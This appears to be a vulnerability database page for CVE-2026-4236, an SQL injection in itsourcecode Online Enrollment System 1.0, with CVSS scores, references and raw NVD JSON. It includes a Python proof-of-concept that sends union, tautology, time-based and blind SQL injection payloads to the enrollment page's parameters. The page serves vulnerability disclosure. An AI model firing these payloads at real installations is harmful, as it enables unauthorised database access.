CVE-2026-4236

Description

A security vulnerability has been detected in itsourcecode Online Enrollment System 1.0. Impacted is an unknown function of the file /enrollment/index.php?view=add. Such manipulation of the argument txtsearch/deptname/name leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

itsourcecode Online Enrollment System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target_url = "http://target.com/enrollment/index.php"

# SQL Injection PoC for CVE-2026-4236
payloads = [
    "?view=add&txtsearch=' OR '1'='1",
    "?view=add&deptname=' UNION SELECT 1,2,3,4,5--",
    "?view=add&name=' AND SLEEP(5)--"
]

for payload in payloads:
    url = target_url + payload
    print(f"[*] Testing: {url}")
    try:
        response = requests.get(url, timeout=10)
        if "error" not in response.text.lower():
            print(f"[!] Potential vulnerability detected!")
            print(f"[*] Response length: {len(response.text)}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

# Boolean-based blind injection test
def test_blind_injection(param, param_value):
    true_payload = f"?view=add&{param}=' AND 1=1--"
    false_payload = f"?view=add&{param}=' AND 1=2--"
    
    r1 = requests.get(target_url + true_payload)
    r2 = requests.get(target_url + false_payload)
    
    if len(r1.text) != len(r2.text):
        print(f"[!] Blind SQL injection confirmed in parameter: {param}")
        return True
    return False

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4236
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4236
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4236/
[4] VulDB https://vuldb.com/cve/CVE-2026-4236
[5] https://github.com/yuji0903/silver-guide/issues/10
[6] https://github.com/yuji0903/silver-guide/issues/12
[7] https://itsourcecode.com/
[8] https://vuldb.com/?ctiid.351159
[9] https://vuldb.com/?id.351159
[10] https://vuldb.com/?submit.771239
[11] https://vuldb.com/?submit.771241
[12] https://vuldb.com/?submit.771242

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4236", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:17.960", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in itsourcecode Online Enrollment System 1.0. Impacted is an unknown function of the file /enrollment/index.php?view=add. Such manipulation of the argument txtsearch/deptname/name leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en itsourcecode Online Enrollment System 1.0. Afectada es una función desconocida del archivo /enrollment/index.php?view=add. Tal manipulación del argumento txtsearch/deptname/name conduce a inyección SQL. El ataque puede ser realizado desde remoto. El exploit ha sido divulgado públicamente y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/yuji0903/silver-guide/issues/10", "source": "[email protected]"}, {"url": "https://github.com/yuji0903/silver-guide/issues/12", "source": "[email protected]"}, {"url": "https://itsourcecode.com/", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351159", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351159", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771239", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771241", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.771242", "source": "[email protected]"}]}}